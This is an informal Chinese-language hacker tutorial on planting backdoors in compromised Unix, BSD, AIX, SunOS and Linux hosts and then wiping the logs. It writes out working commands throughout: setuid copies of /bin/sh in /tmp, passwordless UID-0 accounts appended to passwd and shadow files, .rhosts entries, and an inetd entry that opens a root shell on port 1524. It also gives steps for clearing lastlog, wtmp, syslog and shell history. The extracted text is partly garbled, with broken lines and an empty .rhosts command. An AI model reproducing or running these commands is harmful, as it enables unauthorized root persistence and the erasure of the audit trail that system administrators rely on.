如果被发现了就没了!可惜啊!其实
开后门
思路方法有很多种1.
uid#cp /bin/sh /tmp/.sh
#chmod u+s /tmp/.sh
加上 suid 位到shell上
虽然很简单但容易被发现2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd
即给系统增加
个 id 为 0(root)帐号无口令
但管理员很快就可以发现哦!
3.echo "
">>/.rhosts如果这个系统开了512,513
port呵呵就可以把
个名为hack加到.rhosts文件中rlogin登陆无要密码!4.修改 sendmail.cf文件 增加
个"wiz" 命令;然后telnet www.xxx.com 25后
wizok5
改已有用户密码如果主机上有好多用户
当你看到个用户好久没登入了就可以改他密码#passwd 可用passwd命令
6.rootkit后门包
网上有好多地方下载
找找自己试试看我也在测试中!不会啊!!!!-Bsd 后门:
echo love::92:206::0:0::/:/bin/sh >> /etc/master.passwd
/usr/sbin/pwd_mkdb /etc/master.passwd
这里我添加
个love用户用户ID是92;ROOT是0哦!好了我们添加
个用户了!那么权限不够如何办呢?cp /bin/sh /tmp/.x (这个x就是随便选个
好像 .sh , .a , .b 等等)chmod 777 /tmp/.x
chmod +s /tmp/.x
用这个给他做个小后门吧
以后我们登陆
这台肉鸡以后就可以用tmp/.x来提升权限了-AIX 后门 (Kelvinzhou教我
感谢你)echo "ingreslock stream tcp nowait root /bin/sh">>/tmp/.x
/usr/sbin/inetd -s /tmp/.x
rm /tmp/.x
这样你就可以telnet ip 1524直接得到rootshell
-SunOs 后门
echo "love::0:0::/:/bin/bash" >> /etc/passwd
echo "love::::::::" >> /etc/shadow
当你以telnet上时
你就是root了!不过不保险!-Linux 后门
echo "love::0:0::/:/bin/bash" >> /etc/passwd
echo "love::::::::" >> /etc/shadow
有时间
话就多留几个后门!留了后门就要擦你
PP了不是吧这也忘了!Unix系统日志文件通常是存放在 "/var/log and /var/adm" 目录下
通常我们可以查看syslog.conf来看看日志配置情况.如:cat /etc/syslog.conf般我们要清除日志有lastlog
utmp
wtmp
messages
syslog
sulog
此外
各种shell还会记录用户使用命令历史它使用用户主目录下文件来记录这些命令历史通常这个文件名字为.sh_history (ksh).history (csh)或.bash_history (bash)等如果你有像wipe.c 那样
清日志
就可以让它来做不然话就要手动了! 建议不要用rm掉日志最好是把日志改编比如:
#cat > /usr/log/lastlog
->这里是你要
写东西也可以不输入哦!^d ->这里
^d是按键 ctrl + d! 结束!#
好了不说了
要学还好多我也很菜!see!
最新评论